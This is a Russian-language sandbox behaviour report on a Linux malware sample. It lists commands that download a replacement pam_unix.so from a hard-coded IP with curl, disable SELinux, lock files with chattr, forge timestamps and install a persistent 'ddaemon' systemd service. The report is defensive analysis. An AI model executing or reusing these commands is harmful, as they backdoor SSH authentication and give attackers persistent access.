Техническая информация
Вредоносные функции:
Удаляет следующие системные файлы:
- /usr/bin/jc_new.sh
Управляет службами:
- ['systemctl', 'restart', 'sshd']
- ['systemctl', 'daemon-reload']
- ['systemctl', 'enable', 'ddaemon']
- ['systemctl', 'start', 'ddaemon']
Запускает процессы:
- sh /usr/bin/jc_new.sh
- tr -d .
- mv /lib/x86_64-linux-gnu/security/pam_unix.so /lib/x86_64-linux-gnu/security/pam_unix.so.bak
- chattr +ia /etc/selinux/config
- cut -c1-3
- chattr +ia /lib/x86_64-linux-gnu/security/pam_unix.so
- sed -i s/^UsePAM no/UsePAM yes/ /etc/ssh/sshd_config
- head -1
- grep -oP pam-\x5cK[\x5cd\x5c.]+
- sed -i s/SELINUX=enforcing/SELINUX=disabled/ /etc/selinux/config
- touch /lib/x86_64-linux-gnu/security/pam_unix.so -r /lib/x86_64-linux-gnu/security/pam_unix.so.bak
- chmod 644 /lib/x86_64-linux-gnu/security/pam_unix.so
- curl -o /lib/x86_64-linux-gnu/security/pam_unix.so http://103.101.205.192:90/jc/pam_unix.so_v
- /bin/sh /usr/bin/which curl
- rm -- /usr/bin/jc_new.sh
- chattr -ia /lib/x86_64-linux-gnu/security/pam_unix.so
Выполняет операции с файловой системой:
Модифицирует права доступа к файлам:
- /usr/lib/x86_64-linux-gnu/security/pam_unix.so
Модифицирует владельца файлов:
- /etc/ssh/sed087j9z
Создает или модифицирует файлы:
- /run/ddaemon.pid
- /usr/bin/jc_new.sh
- /usr/lib/x86_64-linux-gnu/security/pam_unix.so
- /etc/ssh/sed087j9z
- /etc/systemd/system/ddaemon.service
Устанавливает блокировку (lock) на файлы:
- /run/ddaemon.pid
Изменяет время создания/доступа/модификации файлов:
- /usr/lib/x86_64-linux-gnu/security/pam_unix.so
Сетевая активность:
Устанавливает соединение:
- 10#.##1.205.192:90
Посылает данные следующим серверам:
- 10#.##1.205.192:90
Получает данные от следующих серверов:
- 10#.##1.205.192:90
